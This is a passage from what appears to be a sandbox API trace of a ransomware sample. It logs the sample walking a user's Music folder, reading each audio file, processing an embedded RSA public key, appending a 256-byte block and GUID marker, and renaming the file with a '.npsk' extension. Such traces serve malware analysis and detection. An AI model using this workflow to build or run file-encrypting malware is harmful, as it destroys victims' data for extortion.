KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.586] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.586] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.586] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f08) returned 1 [0217.587] CryptCreateHash (in: hProv=0x7b1f08, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.587] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.587] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.587] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.587] GetLastError () returned 0x0 [0217.587] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.587] CryptReleaseContext (hProv=0x7b1f08, dwFlags=0x0) returned 1 [0217.587] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.587] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.587] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.588] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.589] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x12e16, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.589] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.589] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.589] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.589] CloseHandle (hObject=0x61c) returned 1 [0217.592] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\c00aIiYACJ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\c00aiiyacj.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\c00aIiYACJ.wav.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\c00aiiyacj.wav.npsk")) returned 1 [0217.606] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80231a70, ftCreationTime.dwHighDateTime=0x1d5e2e5, ftLastAccessTime.dwLowDateTime=0xdc93c600, ftLastAccessTime.dwHighDateTime=0x1d5dd28, ftLastWriteTime.dwLowDateTime=0xdc93c600, ftLastWriteTime.dwHighDateTime=0x1d5dd28, nFileSizeHigh=0x0, nFileSizeLow=0xbfc2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J5dxJ6paTBfEu.mp3", cAlternateFileName="J5DXJ6~1.MP3")) returned 1 [0217.606] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\J5dxJ6paTBfEu.mp3") returned=".mp3" [0217.606] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\J5dxJ6paTBfEu.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\j5dxj6patbfeu.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.607] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=49090) returned 1 [0217.607] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.609] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xbf9c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.609] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.611] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xbfc2, lpOverlapped=0x0) returned 1 [0217.612] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.612] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.612] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.612] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f08) returned 1 [0217.613] CryptCreateHash (in: hProv=0x7b1f08, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.613] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.613] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.613] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.613] GetLastError () returned 0x0 [0217.613] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.613] CryptReleaseContext (hProv=0x7b1f08, dwFlags=0x0) returned 1 [0217.613] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.613] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.613] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.614] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.614] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xbfc2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.614] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.614] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.615] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.615] CloseHandle (hObject=0x61c) returned 1 [0217.617] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\J5dxJ6paTBfEu.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\j5dxj6patbfeu.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\J5dxJ6paTBfEu.mp3.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\j5dxj6patbfeu.mp3.npsk")) returned 1 [0217.618] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x997f5d50, ftCreationTime.dwHighDateTime=0x1d5e0ae, ftLastAccessTime.dwLowDateTime=0xaa2f240, ftLastAccessTime.dwHighDateTime=0x1d5d95b, ftLastWriteTime.dwLowDateTime=0xaa2f240, ftLastWriteTime.dwHighDateTime=0x1d5d95b, nFileSizeHigh=0x0, nFileSizeLow=0x3414, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LamKF7giK5gdPAfbEmR9.mp3", cAlternateFileName="LAMKF7~1.MP3")) returned 1 [0217.618] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\LamKF7giK5gdPAfbEmR9.mp3") returned=".mp3" [0217.619] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\LamKF7giK5gdPAfbEmR9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\lamkf7gik5gdpafbemr9.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.620] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=13332) returned 1 [0217.620] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.621] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x33ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.621] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.623] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x3414, lpOverlapped=0x0) returned 1 [0217.623] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.624] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.624] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.624] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f08) returned 1 [0217.625] CryptCreateHash (in: hProv=0x7b1f08, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.625] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.625] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.625] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.625] GetLastError () returned 0x0 [0217.625] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.625] CryptReleaseContext (hProv=0x7b1f08, dwFlags=0x0) returned 1 [0217.625] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.625] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.625] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.625] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.625] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x3414, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.625] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.626] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.626] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.626] CloseHandle (hObject=0x61c) returned 1 [0217.631] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\LamKF7giK5gdPAfbEmR9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\lamkf7gik5gdpafbemr9.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\LamKF7giK5gdPAfbEmR9.mp3.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\lamkf7gik5gdpafbemr9.mp3.npsk")) returned 1 [0217.633] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2015c70, ftCreationTime.dwHighDateTime=0x1d5deb6, ftLastAccessTime.dwLowDateTime=0x2dd88d30, ftLastAccessTime.dwHighDateTime=0x1d5dd4b, ftLastWriteTime.dwLowDateTime=0x2dd88d30, ftLastWriteTime.dwHighDateTime=0x1d5dd4b, nFileSizeHigh=0x0, nFileSizeLow=0xa799, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QW-82BrGFMTY.mp3", cAlternateFileName="QW-82B~1.MP3")) returned 1 [0217.633] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\QW-82BrGFMTY.mp3") returned=".mp3" [0217.633] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\QW-82BrGFMTY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\qw-82brgfmty.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.634] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=42905) returned 1 [0217.634] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.636] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa773, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.636] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.637] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.637] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xa799, lpOverlapped=0x0) returned 1 [0217.638] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.638] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.638] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.638] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f08) returned 1 [0217.639] CryptCreateHash (in: hProv=0x7b1f08, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.639] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.639] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.639] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: 